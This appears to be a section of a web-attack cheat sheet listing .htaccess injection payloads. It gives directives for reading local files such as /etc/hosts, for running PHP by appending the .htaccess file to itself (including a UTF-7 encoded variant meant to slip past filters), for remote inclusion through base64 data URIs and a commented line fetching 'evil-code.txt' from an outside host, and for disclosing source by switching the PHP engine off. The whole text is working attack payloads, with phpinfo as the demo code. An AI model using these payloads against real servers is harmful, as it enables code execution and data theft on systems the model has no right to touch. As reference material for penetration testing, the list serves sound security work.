5.1.4. htaccess injection payload

5.1.4.1. file inclusion

php_value auto_append_file /etc/hosts

5.1.4.2. code execution

php_value auto_append_file .htaccess
#<?php phpinfo();

5.1.4.3. file inclusion

php_flag allow_url_include 1
php_value auto_append_file data://text/plain;base64,PD9waHAgcGhwaW5mbygpOw==
#php_value auto_append_file data://text/plain,%3C%3Fphp+phpinfo%28%29%3B
#php_value auto_append_file https://sektioneins.de/evil-code.txt

5.1.4.4. code execution with UTF-7

php_flag zend.multibyte 1
php_value zend.script_encoding "UTF-7"
php_value auto_append_file .htaccess
#+ADw?php phpinfo()+ADs

5.1.4.5. Source code disclosure

php_flag engine 0